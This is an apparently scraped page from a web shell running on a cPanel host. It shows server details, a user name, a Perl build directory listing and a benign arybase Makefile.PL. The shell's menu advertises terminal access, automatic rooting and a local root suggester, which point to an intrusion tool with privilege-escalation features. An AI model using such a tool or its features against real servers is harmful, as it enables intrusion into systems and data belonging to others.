Linux cpanel2.daytoncreative.net 2.6.32-754.29.2.el6.x86_64 #1 SMP Tue May 12 17:39:04 UTC 2020 x86_64
Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
Server IP : 70.62.220.67 & Your IP : 216.73.216.193
Domains :
Cant Read [ /etc/named.conf ]
User : michaelgreg
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
log /
perl-5.20.2 /
ext /
arybase /
Delete
Unzip
Name
Size
Permission
Date
Action
blib
[ DIR ]
drwxr-xr-x
2016-10-10 17:38
t
[ DIR ]
drwxr-xr-x
2015-02-14 16:56
Makefile
29.21
KB
-rw-r--r--
2016-10-10 17:38
Makefile.PL
1.54
KB
-rw-r--r--
2016-10-10 17:38
arybase.bs
0
B
-rw-r--r--
2016-10-10 17:41
arybase.c
18.35
KB
-rw-r--r--
2016-10-10 17:38
arybase.o
21.06
KB
-rw-r--r--
2016-10-10 17:38
arybase.pm
2.75
KB
-r--r--r--
2014-12-27 11:49
arybase.xs
11.85
KB
-r--r--r--
2014-12-27 11:49
pm_to_blib
0
B
-rw-r--r--
2016-10-10 17:38
ptable.h
4.94
KB
-r--r--r--
2014-12-27 11:48
Save
Rename
#-*- buffer-read-only: t -*- # This Makefile.PL was written by make_ext.pl. # It will be deleted automatically by make realclean use strict; use ExtUtils::MakeMaker; # This is what the .PL extracts to. Not the ultimate file that is installed. # (ie Win32 runs pl2bat after this) # Doing this here avoids all sort of quoting issues that would come from # attempting to write out perl source with literals to generate the arrays and # hash. my @temps = 'Makefile.PL'; foreach (glob('scripts/pod*.PL')) { # The various pod*.PL extractors change directory. Doing that with relative # paths in @INC breaks. It seems the lesser of two evils to copy (to avoid) # the chdir doing anything, than to attempt to convert lib paths to # absolute, and potentially run into problems with quoting special # characters in the path to our build dir (such as spaces) require File::Copy; my $temp = $_; $temp =~ s!scripts/!!; File::Copy::copy($_, $temp) or die "Can't copy $temp to $_: $!"; push @temps, $temp; } my $script_ext = $^O eq 'VMS' ? '.com' : ''; my %pod_scripts; foreach (glob('pod*.PL')) { my $script = $_; s/.PL$/$script_ext/i; $pod_scripts{$script} = $_; } my @exe_files = values %pod_scripts; WriteMakefile( NAME => 'arybase', VERSION_FROM => 'arybase.pm', ABSTRACT_FROM => 'arybase.pm', realclean => { FILES => "@temps" }, (%pod_scripts ? ( PL_FILES => \%pod_scripts, EXE_FILES => \@exe_files, clean => { FILES => "@exe_files" }, ) : ()), ); # ex: set ro: